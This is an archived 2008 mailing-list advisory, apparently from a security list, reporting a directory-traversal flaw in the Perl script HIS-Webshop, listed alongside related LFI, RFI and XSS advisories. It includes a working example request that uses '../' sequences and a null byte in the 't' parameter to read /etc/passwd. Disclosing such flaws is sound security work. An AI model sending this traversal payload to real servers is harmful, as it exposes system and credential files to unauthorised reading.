Related information Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl) [SECURITY] [DSA 1528-1] New serendipity packages fix cross site scripting [DSECRG-08-020] RFI-LFI in PowerClan 1.14a [DSECRG-08-021] Multiple LFI in PowerPHPBoard 1.00b [DSECRG-08-019] LFI in PowerBook 1.21 From:Zero-X ScriptKiddy <zero-x_(at)_linuxmail.org> Date:24.03.2008Subject:HIS-webshop is vulnerable against Directory-Traversal (www.shoppark.de)HIS-Webshop is a shopping-system written in Perl by www.shoppark.de The script doesn´t check the "t"-parameter. Example: http://server.com/cgi-bin/his-webshop.pl?t=../../../../../../../../etc/passwd% 00 << Greetz Zero X >>
Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
[SECURITY] [DSA 1528-1] New serendipity packages fix cross site scripting
[DSECRG-08-020] RFI-LFI in PowerClan 1.14a
[DSECRG-08-021] Multiple LFI in PowerPHPBoard 1.00b
[DSECRG-08-019] LFI in PowerBook 1.21
